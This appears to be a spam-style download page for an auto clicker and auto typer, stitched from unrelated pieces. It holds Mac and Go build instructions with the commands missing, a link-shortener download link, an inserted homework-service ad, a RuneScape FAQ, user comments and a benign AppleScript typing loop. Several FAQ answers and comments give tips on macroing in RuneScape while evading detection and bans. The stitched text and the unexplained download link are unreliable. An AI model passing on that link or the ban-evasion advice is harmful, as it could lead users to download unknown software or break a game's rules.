When you try to start the clicker, a warning should appear about Accessiblity settings. Search for Security and Privacy, enter the main administrator password and allow the Terminal app to have access to the mouse. Click the bottom left lock to adjust the settings and set Accessibility on Terminal to checked. More directions if you get stuck on accessibility.

For newer M1 or M2 Macs, a version of the auto clicker can be compiled using the Go source code shared with the Linux version. After installing Go and Xcode, the binary can be built from the command-line with:

Download Auto Clicker Typer

DOWNLOAD 🔥 https://bytlly.com/2yGclI 🔥

The auto clicker is separate, with its Go source available along with a pre-compiled download for 64-bit systems (11mb). The source included in this zip can be used to build other architectures or systems in Go with:

Additional features include a calculator and an update button which you can use to update the client whenever improvements are released. If you want to maintain access without redownloading every time, simply save the program to your desktop.

This program is quite a simple example of what you can complete by yourself. By using services like for your STEM assignments during your education, you'll be able to get more skills and knowledge than you normally do and create alike programs in the second year of college. Why not? With a little help from senior specialists, you'll be able to learn much faster than other students if you're interested in programming and making apps and other staff. You should give it a try and check yourself after getting such academic STEM assistance.

Q: Place to alch where no randoms?

A: Soul wars bank, absolute no randoms.

Q: How come there's no download button for clicker?

A: Yes there is, click save instead of open, noob.

Q: Can i set the auto-typer to click faster then .1 seconds?

A: What is the point, chill.

Q: Can this auto clicker bot skills for you?

A: it's not a bot, it simply clicks. An example of this could be clicking alch every 1.6 seconds. If you try mining with the auto clicker...then that in it's self is pointless, It wont drop/bank anything for you, not to mention it CANNOT DO RANDOM EVENTS.

Q: Can I get banned for using this?

A: Sure, but don't be stupid and let it alch for you at 1.6 seconds for 100 hours, and I'm sure you will be OK.

Q: Can the auto clicker/typer work on other games besides runescape?

A: This can work on anything, as simply as note pad. It's a AUTO-TYPER and a AUTO-CLICKER, it can automaticly type or click anything...It is not just designed for Runescape.

Q: If time is money...

A: Then you should go out and buy a Rolex.

1. Will you get a donate button?

2. Can you make it so that the auto-clicker and auto-talker will switch in order (randomly would be awesome too!) between a list of click times and chat phrases, respectively? (I don't want to get banned ;o)

3. You are awesome (obviously).

Hello I have been using your auto typer for a while now and for past few days that I've been using it, I would type in a message and it wouldn't compleatly load it into my typing area. It would lagg making the auto typer keep typing and not fully finishing the first message before moving on to repeat it. Please tell me what's going on or please recommend another reliable auto typing program. Thank you.

I used this for alching and i never got banned, but i wanna know what the chances are of getting banned if you use it in a more crowded area where people can see you? eq, the new lava flow mine, because now it can work for mining there

auto typer

yeah no way imagine how easy it would be for jagex to detect this... in their logs they see a bunch of clicks at the same coordinates and nothing else. What would they think huh?


This used too work very good, runescape didn't expect anything, but now their team is on this 24/7, they have scripts that now alert them when a player is macro'ing. I used to use this all the time, then I got 94 mage and decided to barrage, but I've been doing some RSPS Coding and made about 40M in RSGP, and I went to buy my runes to alch to 99 again, I left on the auto clicker for about a hour only and logged me out, I try to log back in and it tells me My Account has been Disabled, for macro'ing. I'm not saying this is shit, as it's not only designed for runescape, but if you do use it for runescape take CONSTANT breaks and leave it off for about 5 minutes after you've done it for about 40. I know it kinda slows you down, but I got banned for 14 days just for auto'ing for a hour. Not worth it.

Dave, why would u want to leave your account logged in for three days straight and while clicking on the same spot for the entire time...

dont you think that would look extremely suspicious to jagex??

This is a nice program. thanks. i have one sujection. i am a data entry operator. i use this program. i want next line typing time is long gap, some time short time gap. so, this timer is using, my time waste. so, plz add a shortcut key, for example. CTR + N (For nex line type)

by regards, Hashar. 

this is completely legit. i got the /5/ error before too but i fixed it somehow but cant remember how i did. i think i redownloaded it. this has no viruses, i use norton360, good job gary, keep up good work :)

HI are you going to be making a MAC version of this? I saw someone else asked it already but I did not find an answer to the question could you please let me know or if there is one the link to it. Thanks

Want me at advertize something for u, for example if u wanna sell a steel bar i can auto chat saying that u are selling a steel bar for 500gp if u want it add him, so something like that for cheap gold.

Want me to add me on runescape purestratt66 or mail me at jagex_rc89@yahoo.com,

sign up on my website for free at www.hellorunescape.webs.com

thank u

Dear Brothers.

First i want to say thanks to owner this software. This software is great.

I wish it could support vietnames language (Unicode). Hope owner this software edit and make it support to vietnamese language (Unicode).

Thank you again.

hey, i used to use this all the time, untill i got windows 7. when i try to use the auto typer it doesnt type anything in runescape .( runescape is the only reason i use it, and the auto click doesnt click when im on the runescape window, it can click everything else except anything on the runescape cielent

Looking for assistance with running the auto clicker. I was using this just fine but now when I try to run it gives me this error. 

 "Run Time Error '380': Invalid property value."

I have deleted and reinstalled and and no change to the error message.

 Do you have any idea what would be causing this. Or any suggestions on how to rectify as I find this to be an invaluble tool. 

Thank in advance for your assistance.

An auto typer for Mac OSX:

Hello everyone, here is an updated version of my auto typer for mac.

You have to build it yourself, but this is very easy....

So, first you have to go into your applications folder, and scroll down to the bottom, where there should be another folder, called "utilities"

open the utilities folder, and find the utility called "AppleScript Editor". open it.

Paste the following code into the applescript window that opens:

tell application "System Events"

set a to "Sample Text"

display dialog "What to say:" default answer "[Default text to say here]"

set a to the text returned of the result


repeat 10 times

activate application "Safari"

keystroke a

delay 0.1

keystroke return

end repeat

display dialog "Do you want to quit?" buttons {"Quit", "Continue"} default button 2

if the button returned of the result is "Quit" then

exit repeat

end if

end repeat

end tell

okay, once you have done that, you have to replace some things. on the line where it says "activate application "Safari"", replace Safari with the browser that you are going to use to play RS. make sure the frist letter is a capital. After that, you want to change [default text to say] to whatever you want the window to say by default. for example, you could make it say a text effect of some sort. (like flash2:)

finally, you can change the line where it says "delay 0.1" and make it take longer to type, by putting in delay 1.0 or delay 0.5 to change how long it takes to type. you can also change the number of times it will repeat itself before you are prompted to continue or quit by changing the line that says "repeat 10 times" and changing the number 10 to something like 40 or 100. 

after you have customized it, just save the file. save it as something like "Spammer" as an application, instead of a script. (you can change that where it says "file format". you dont have to do anything else; just start RS and make the thing start. Also, it is NOT something that will hack your account. i will explain exactly why down below:

==========================WARNING: KINDA BORING/LONG================

tell application "System Events" (this will make a window. its telling the computer to open a window under the app system events.)

set a to "Sample Text" (this basically makes it so that a = the default text, or if you get rid of the default text, it makes a = to whatever you changed the default text to.)

display dialog "What to say:" default answer "[Default text to say here]" (this tells the window to display "What to say" and default answer makes a little text box below it that you can type stuff in)

set a to the text returned of the result (this is what i mentioned before; if you change the sample text to something else, this changes "a" (the variable where the sample text is stored) to whatever you put in.)

repeat (this allows a loop)

repeat 10 times (number of times to repeat)

activate application "Safari" (this switches to the browser. if it didnt have this, the app would act crazy and just be dumb. (trust me, i have had it change all of my files to spam names because i forgot that line XD))

keystroke a (this makes the computer type "a" (the text that you typed in, or the default text) into the browser.)

delay 0.1 (how long it will take for each line)

keystroke return (this is the equivalent of pressing enter)

end repeat (after the program has repeated this X amount of times (x being whatever number you deicde for it to repeat) it will stop repeating.

display dialog "Do you want to quit?" buttons {"Quit", "Continue"} default button 2 (this makes 2 buttons, so that you have an option to quit or continue. displays the text "do you want to quit" as well.

if the button returned of the result is "Quit" then (this means that if you press quit, you end the program)

exit repeat (see above, this is exiting the loop function)

end if (this ends the If part of the program)

end repeat (this ends the loop function)

end tell (remember at the beginning where it says "tell application "system events"? yeah, this shuts that down, thus completing the cycle and shutting down the whole app.)


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